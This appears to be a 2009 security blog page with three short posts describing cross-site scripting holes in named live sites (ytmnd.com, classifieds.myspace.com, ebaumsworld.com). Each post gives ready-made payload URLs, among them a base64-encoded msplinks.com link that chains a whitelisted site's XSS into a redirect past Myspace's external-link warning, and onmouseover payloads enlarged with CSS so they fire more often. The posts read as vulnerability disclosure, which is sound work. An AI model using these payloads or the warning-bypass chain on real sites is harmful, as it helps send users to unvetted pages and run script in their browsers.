This site is soon to be deprecated by http://www.johnleitch.net

Sunday, June 21, 2009

Bypassing Msplinks.com Notifications - Myspace.com

As a preventative measure Myspace.com routes all user posted links through Msplinks.com. If the linked site is not on the msplinks whitelist a notification that the user is visiting an external site is displayed, and the the user must click another link to continue. To circumvent this system, an XSS vulnerability in a whitelisted site can be used as a redirect.



Fortunately ytmnd.com has a vulnerability. By prepending 01 to an xss redirect url, base64 encoding the result, and appending it to http://www.msplinks.com/ we can create a link that can be posted on Myspace. When the user clicks this link, no external site warnings are displayed.

The vulnerable whitelisted site:
http://www.ytmnd.com/search?q="]}}};window.location='http://www.asdf.com/';{{{//

A msplinks link that redirects to the xss redirect:
http://www.msplinks.com/MDFodHRwOi8vd3d3Lnl0bW5kLmNvbS9zZWFyY2g/cT0lMjIlNUQlN0QlN0QlN0Q7d2luZG93LmxvY2F0aW9uPSdodHRwOi8vd3d3LmFzZGYuY29tLyc7JTdCJTdCJTdCLy8=
Posted by John Leitch at 6:03 PM 6 comments
Labels: , , , , , ,

Thursday, June 4, 2009

Breaking Things With Null - Classifieds.Myspace.Com

Sometimes passing special characters through a query string can cause in strange behavior. Using URL encoding we can search for the null character on classifieds.myspace.com. The result is an error page notifying the user that the server is too busy, and it just so happens that the retry link has a Chrome and IE compatible XSS vulnerability.



http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);

And with styling:

http://classifieds.myspace.com/browse/?q=%00"onmouseover="alert(0);"style="float:left;height:999px;width:999px;margin-top:-400px
Posted by John Leitch at 11:50 PM 1 comments
Labels: , , , , , , , ,

Tuesday, June 2, 2009

Getting The Most Out Of onmouseover - eBaumsWorld.com

Getting The Most Out Of onmouseover - www.ebaumsworld.com
By styling a vulnerable element the inline onmouseover event can be nearly as effective as onload. Using the width and height CSS properties the chance of a user hovering their mouse over a vulnerable element can be greatly increased.



http://www.ebaumsworld.com/search/criteria="onmouseover="alert(0);

Prior to styling the control the injected script is only run if the user hovers over the search input in the center of the screen.



http://www.ebaumsworld.com/search/criteria="style="width:999px;height:999px;"onmouseover="alert(0);

With more screen real estate taken up by the newly styled input chances of triggering the event are better.
Posted by John Leitch at 6:48 PM 2 comments
Labels: , , , , , , ,
Subscribe to: Posts (Atom)